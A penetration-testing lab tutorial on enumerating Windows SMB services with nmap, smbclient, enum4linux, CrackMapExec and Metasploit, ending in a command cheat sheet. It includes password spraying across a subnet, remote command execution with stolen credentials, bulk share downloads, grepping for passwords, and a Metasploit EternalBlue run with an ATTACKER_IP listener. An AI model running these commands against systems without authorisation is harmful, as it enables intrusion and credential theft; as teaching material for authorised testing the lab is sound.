๐ฏ Lab Objectives
- Understand what SMB is and why it's a prime target
- List available SMB shares without credentials (null session)
- Enumerate users, groups, and domain info with enum4linux
- Use CrackMapExec for rapid SMB reconnaissance
- Check for EternalBlue (MS17-010) vulnerability
SMB (Server Message Block) is the protocol Windows uses to share files, printers, and services over a network. It runs on port 445. Many Windows misconfigurations expose sensitive information with no credentials needed.
Step 1 โ What is SMB?
# SMB ports:
# 139/tcp โ NetBIOS session (older SMB)
# 445/tcp โ SMB over TCP (modern, most common)
# 137/udp โ NetBIOS name service
# 138/udp โ NetBIOS datagram
# SMB versions:
# SMBv1 โ very old, has EternalBlue vulnerability (NEVER use in production)
# SMBv2 โ Windows Vista+, much improved
# SMBv3 โ Windows 8+, encryption support
# What you can find on SMB:
# - Shared folders (files, backups, configs, credentials)
# - Usernames and group names
# - Domain information
# - Password policies
Step 2 โ Port Scanning
# Quick check if SMB is open
nmap -p 139,445 192.168.1.0/24
# Detailed SMB scan
nmap -p 445 --script smb-security-mode 192.168.1.10
# Check OS and SMB version
nmap -p 445 --script smb-os-discovery 192.168.1.10
Step 3 โ smbclient
# List shares (null session โ no credentials)
smbclient -L //192.168.1.10 -N
# List shares with credentials
smbclient -L //192.168.1.10 -U username
# Connect to a specific share
smbclient //192.168.1.10/SHARE_NAME -N
# Inside smbclient โ common commands:
ls โ list files
get filename โ download file
put localfile โ upload file
mget *.txt โ download all .txt files
cd directory โ change directory
pwd โ show current path
exit โ quit
# Recursively download everything from a share
smbclient //192.168.1.10/SHARE -N -c "recurse; prompt; mget *"
Step 4 โ enum4linux
# Full enumeration (users, shares, groups, policies)
enum4linux -a 192.168.1.10
# Specific flags:
-U โ users
-S โ shares
-G โ groups
-P โ password policy
-r โ SID enumeration
-n โ NetBIOS info
-a โ all of the above
# enum4linux-ng (modern rewrite, better output)
sudo apt install enum4linux-ng -y
enum4linux-ng -A 192.168.1.10
# What you're looking for in the output:
# [+] Got domain/workgroup name: WORKGROUP
# [+] Enumerating users: Administrator, Guest, john, jane
# [+] Share: IPC$, C$, Users, Backups
# [+] Password policy: min length 0 (weak!)
Step 5 โ CrackMapExec
# Install
sudo apt install crackmapexec -y
# Enumerate a host
crackmapexec smb 192.168.1.10
# Enumerate shares (null)
crackmapexec smb 192.168.1.10 --shares
# Enumerate with credentials
crackmapexec smb 192.168.1.10 -u admin -p password --shares
# Enumerate users
crackmapexec smb 192.168.1.10 -u admin -p password --users
# Spray a password across multiple hosts
crackmapexec smb 192.168.1.0/24 -u admin -p Password123
# Test a list of credentials
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt
# Execute a command (if you have creds)
crackmapexec smb 192.168.1.10 -u admin -p password -x "whoami"
Step 6 โ Nmap SMB Scripts
# Run all SMB scripts
nmap -p 445 --script "smb-*" 192.168.1.10
# Enumerate shares
nmap -p 445 --script smb-enum-shares 192.168.1.10
# Enumerate users
nmap -p 445 --script smb-enum-users 192.168.1.10
# Check for vulnerabilities
nmap -p 445 --script smb-vuln* 192.168.1.10
Step 7 โ EternalBlue (MS17-010) Check
# Check if vulnerable to EternalBlue (SMBv1 exploit used by WannaCry)
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.10
# Output if vulnerable:
# VULNERABLE:
# Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
# State: VULNERABLE
# Exploit with Metasploit (on authorised systems ONLY)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set LHOST ATTACKER_IP
run
Step 8 โ Mounting SMB Shares
# Mount a share locally (easier to browse than smbclient)
sudo mkdir /mnt/smb
sudo mount -t cifs //192.168.1.10/Share /mnt/smb -o username=guest,password=
# With credentials
sudo mount -t cifs //192.168.1.10/Share /mnt/smb -o username=admin,password=Password123
# Browse and search for interesting files
find /mnt/smb -name "*.txt" -o -name "*.config" -o -name "*.xml" 2>/dev/null
grep -r "password" /mnt/smb/ 2>/dev/null
# Unmount
sudo umount /mnt/smb
๐ SMB Cheat Sheet
| Task | Command |
|---|---|
| List shares (null) | smbclient -L //IP -N |
| Connect to share | smbclient //IP/SHARE -N |
| Full enum | enum4linux -a IP |
| CME recon | crackmapexec smb IP --shares |
| EternalBlue check | nmap -p445 --script smb-vuln-ms17-010 IP |
| Mount share | mount -t cifs //IP/Share /mnt/smb -o username=,password= |
Lab Complete! SMB is one of the most exploited services in internal network penetration tests. Always enumerate it thoroughly โ anonymous shares containing passwords are extremely common.